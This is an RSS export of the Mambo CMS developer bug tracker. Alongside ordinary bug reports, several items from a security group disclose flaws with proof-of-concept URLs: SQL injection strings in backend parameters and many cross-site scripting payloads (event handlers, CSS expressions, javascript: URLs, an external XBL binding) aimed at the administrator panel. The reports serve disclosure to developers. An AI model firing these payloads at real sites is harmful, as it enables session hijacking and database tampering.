<?xml version="1.0" ?><rss version="2.0">
  <channel>
    <title>Mambo Tracker-&gt;</title>
    <lastBuildDate>Fri, 16 Dec 2011 03:04:30 -0500</lastBuildDate>
    <description>Mambo Tracker System</description>
    <link>http://www.mambo-developer.org/tracker/</link>
        <item>
      <title>FS#485: writeable status for cache folder inconsistencies</title>
      <author>Andres Felipe Vargas valencia</author>
      <pubDate>Fri, 16 Dec 2011 03:04:30 -0500</pubDate>
      <description><![CDATA[Global Configuration -&gt; Cache settings are checking the absolute path, while System -&gt; System Information -&gt; Permissions are checking the relative path to the current script that is wrong thing,  when a invalid path is used for cache, the first shows cache as unwriteable while the last one shows it as writeable]]></description>
      <link>http://www.mambo-developer.org/tracker/index.php?do=details&amp;task_id=485</link>
      <guid>http://www.mambo-developer.org/tracker/index.php?do=details&amp;task_id=485</guid>
    </item>
        <item>
      <title>FS#484: Link List disappears when quote marks used in content title</title>
      <author>Chas Large</author>
      <pubDate>Tue, 05 Jul 2011 13:33:00 -0400</pubDate>
      <description><![CDATA[If a content item contains a word or words surrounded by quote marks eg; &quot;this title&quot; then the WYSIWYG editor will not then display the &quot;Link List&quot; combo box when a new link is attempted to be added to a later content item.<br />
<br />
This is discussed in the support forum topic here:<br />
http://forum.mambo-foundation.org/showthread.php?t=18912 especially from post 9 onwards.<br />
<br />
]]></description>
      <link>http://www.mambo-developer.org/tracker/index.php?do=details&amp;task_id=484</link>
      <guid>http://www.mambo-developer.org/tracker/index.php?do=details&amp;task_id=484</guid>
    </item>
        <item>
      <title>FS#483: I have new mambo5, change cakephp version to 1.3.6</title>
      <author>Suriya Kaewmungmuang</author>
      <pubDate>Tue, 23 Nov 2010 23:33:53 -0500</pubDate>
      <description><![CDATA[I updated mambo from svn and change cakephp version to be 1.3.6]]></description>
      <link>http://www.mambo-developer.org/tracker/index.php?do=details&amp;task_id=483</link>
      <guid>http://www.mambo-developer.org/tracker/index.php?do=details&amp;task_id=483</guid>
    </item>
        <item>
      <title>FS#482: [Backend] SQL Injection</title>
      <author>yehg.net</author>
      <pubDate>Sun, 31 Oct 2010 18:40:04 -0400</pubDate>
      <description><![CDATA[Replace http://attacker.in/mambo/ with your own url.<br />
<br />
<br />
=====Backend (Administrator)=====<br />
<br />
<br />
====param: section====<br />
<br />
<br />
http://attacker.in/mambo/administrator/index2.php?order[]=0&amp;limit=10&amp;task=&amp;cid[]=on&amp;chosen=&amp;type=other&amp;hidemainmenu=0&amp;section=com_weblinks%27&amp;boxchecked=0&amp;toggle=on&amp;limitstart=0&amp;act=&amp;option=com_categories<br />
<br />
<br />
<br />
====param: zorder====<br />
<br />
<br />
http://attacker.in/mambo/administrator/index2.php?limit=10&amp;order%5b%5d=11&amp;boxchecked=0&amp;toggle=on&amp;search=sqli&amp;task=&amp;limitstart=0&amp;cid%5b%5d=on&amp;zorder=c.ordering+DESC&#039;&amp;filter_authorid=62&amp;hidemainmenu=0&amp;option=com_typedcontent<br />
]]></description>
      <link>http://www.mambo-developer.org/tracker/index.php?do=details&amp;task_id=482</link>
      <guid>http://www.mambo-developer.org/tracker/index.php?do=details&amp;task_id=482</guid>
    </item>
        <item>
      <title>FS#481: [Backend] Cross Site Scripting</title>
      <author>yehg.net</author>
      <pubDate>Sun, 31 Oct 2010 18:37:37 -0400</pubDate>
      <description><![CDATA[Replace attacker.in/mambo with your local domain/path<br />
<br />
<br />
=====BackEnd [Administrator Section]=====<br />
<br />
<br />
<br />
====param: menu====<br />
<br />
http://attacker.in/mambo/administrator/index2.php?option=com_menumanager&amp;task=edit&amp;hidemainmenu=1&amp;menu=Move+your+mouse+here%22%20style=position:absolute;width:1000px;height:1000px;top:0;left:0;%20onmouseover=alert%28/XSS/%29%20<br />
<br />
<br />
====param: menutype==== <br />
[hidden form xss which works in in IE 6,7 and older versions of Firefox]<br />
<br />
http://attacker.in/mambo/administrator/index2.php?option=com_menus&amp;menutype=xss&quot;%20style%3dx%3aexpression(alert(/XSS/))%20XSSSSSSSS<br />
http://attacker.in/mambo/administrator/index2.php?option=com_menus&amp;menutype=xss&quot;%20%20%20style=background-image:url(&#039;javascript:alert(/XSS/)&#039;);width:1000px;height:1000px;display:block;%20x=%20XSSSSSSSS<br />
<br />
<br />
====param: zorder====<br />
<br />
http://attacker.in/mambo/administrator/index2.php?limit=10&amp;order%5b%5d=11&amp;boxchecked=0&amp;toggle=on&amp;search=simple_search&amp;task=&amp;limitstart=0&amp;cid%5b%5d=on&amp;zorder=c.ordering+DESC&quot;&gt;alert(/XSS/)&amp;filter_authorid=62&amp;hidemainmenu=0&amp;option=com_typedcontent<br />
<br />
<br />
====param: search====<br />
<br />
http://attacker.in/mambo/administrator/index2.php?limit=10&amp;boxchecked=0&amp;toggle=on&amp;search=xss&quot;&gt;alert(/XSS/)&amp;task=&amp;limitstart=0&amp;hidemainmenu=0&amp;option=com_comment<br />
<br />
<br />
====param: client====<br />
<br />
<br />
http://attacker.in/mambo/administrator/index2.php?option=com_modules&amp;client=%27%22%20onmouseover=alert%28/XSS/%29%20a=%22%27<br />
NB: mouseover on &quot;banner&quot; link<br />
<br />
<br />
====param: section====  <br />
[hidden form xss, esp in IE 6,7 and older versions of Firefox]<br />
<br />
<br />
http://attacker.in/mambo/administrator/index2.php?option=com_categories&amp;section=com_weblinks&quot;%20style%3dx%3aexpression(alert(/XSS/))%20XSSSSSSSS&amp;task=editA&amp;hidemainmenu=1&amp;id=2<br />
<br />
http://attacker.in/mambo/administrator/index2.php?option=com_categories&amp;section=com_weblinks&quot;%20style%3d-moz-binding:url(http://www.businessinfo.co.uk/labs/xbl/xbl.xml%23xss)%20XSSSSSSSS&amp;task=editA&amp;hidemainmenu=1&amp;id=2<br />
<br />
http://attacker.in/mambo/administrator/index2.php?option=com_categories&amp;section=com_weblinks&quot;%20%20style=background-image:url(&#039;javascript:alert(0)&#039;);width:1000px;height:1000px;display:block;%20x=%20XSSSSSSSS&amp;task=editA&amp;hidemainmenu=1&amp;id=2<br />
<br />
http://attacker.in/mambo/administrator/index2.php?option=com_categories&amp;section=com_weblinks&quot;%20%20style=background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%20x=%20XSSSSSSSS&amp;task=editA&amp;hidemainmenu=1&amp;id=2]]></description>
      <link>http://www.mambo-developer.org/tracker/index.php?do=details&amp;task_id=481</link>
      <guid>http://www.mambo-developer.org/tracker/index.php?do=details&amp;task_id=481</guid>
    </item>
        <item>
      <title>FS#480: Atom feed tag all the items with today date</title>
      <author>Andres Felipe Vargas valencia</author>
      <pubDate>Sat, 30 Oct 2010 00:13:11 -0400</pubDate>
      <description><![CDATA[When you use atom to publish your Mambo site feeds, all items get today date and not article&#039;s created date.]]></description>
      <link>http://www.mambo-developer.org/tracker/index.php?do=details&amp;task_id=480</link>
      <guid>http://www.mambo-developer.org/tracker/index.php?do=details&amp;task_id=480</guid>
    </item>
        <item>
      <title>FS#479: Cross Site Scripting</title>
      <author>yehg.net</author>
      <pubDate>Thu, 28 Oct 2010 14:46:53 -0400</pubDate>
      <description><![CDATA[How to reproduce (Proof-of-concept):<br />
======================================<br />
<br />
<br />
1. Go to the following poc site<br />
http://attacker.in/mambo/index.php?option=com_content&amp;task=%22%20style=width:1000px;height:1000px;top:0;left:0;position:absolute%20onmouseover=alert%28/XSS/%29%20ns=%22%20&amp;id=3&amp;Itemid=32<br />
<br />
2. Move your mouse a bit<br />
You&#039;ll get the XSS alert box.<br />
<br />
=========================================<br />
<br />
For more information about XSS, see:<br />
http://en.wikipedia.org/wiki/Cross-site_scripting<br />
<br />
<br />
<br />
<br />
IMPACT<br />
<br />
Attackers can compromise currently logged-in user/administrator<br />
session and impersonate arbitrary user actions available under<br />
/administrator/ functions.<br />
<br />
<br />
<br />
Best regards<br />
YGN Ethical Hacker Group<br />
http://yehg.net/<br />
]]></description>
      <link>http://www.mambo-developer.org/tracker/index.php?do=details&amp;task_id=479</link>
      <guid>http://www.mambo-developer.org/tracker/index.php?do=details&amp;task_id=479</guid>
    </item>
        <item>
      <title>FS#478: [security] Path Dislcosure</title>
      <author>yehg.net</author>
      <pubDate>Wed, 22 Sep 2010 06:10:38 -0400</pubDate>
      <description><![CDATA[When directly accessed through browser, some files reveal server path disclosure like:<br />
<br />
Fatal error:  Class &#039;SpellChecker&#039; not found in /home/attacker/public_html/mambo/mambots/editors/mostlyce/jscripts/tiny_mce/plugins/spellchecker/classes/PSpellShell.php on line 9<br />
<br />
<br />
Please see the attachment for vulnerable urls.<br />
<br />
Many developers see this path disclosure as server issues but this poses risk to users in some situations.<br />
http://yehg.net/lab/pr0js/view.php/path_disclosure_vulnerability.txt]]></description>
      <link>http://www.mambo-developer.org/tracker/index.php?do=details&amp;task_id=478</link>
      <guid>http://www.mambo-developer.org/tracker/index.php?do=details&amp;task_id=478</guid>
    </item>
        <item>
      <title>FS#477: includes/vcard.class.php</title>
      <author>Luis</author>
      <pubDate>Tue, 27 Jul 2010 17:47:40 -0400</pubDate>
      <description><![CDATA[is necessary to rename or remove function quoted_printable_encode<br />
<br />
php 5.3.2 includes a function name wholes themselves<br />
<br />
Regards<br />
<br />
Luis]]></description>
      <link>http://www.mambo-developer.org/tracker/index.php?do=details&amp;task_id=477</link>
      <guid>http://www.mambo-developer.org/tracker/index.php?do=details&amp;task_id=477</guid>
    </item>
        <item>
      <title>FS#476: methods query, setBareQuery and setQuery of database class are not consistent</title>
      <author>Andres Felipe Vargas valencia</author>
      <pubDate>Thu, 01 Jul 2010 11:52:53 -0400</pubDate>
      <description><![CDATA[setQuery, sets the sql to execute but first process the #__ prefix<br />
setBareQuery, sets the sql to execute  WITHOUT process the #__ prefix<br />
<br />
Now the query method allows to pass a sql as argument, but this sql is not getting processed, it sounds to me that the *only* way to avoid the process should be using setBareQuery, all the others methods have to process the sql. ]]></description>
      <link>http://www.mambo-developer.org/tracker/index.php?do=details&amp;task_id=476</link>
      <guid>http://www.mambo-developer.org/tracker/index.php?do=details&amp;task_id=476</guid>
    </item>
      </channel>
</rss>

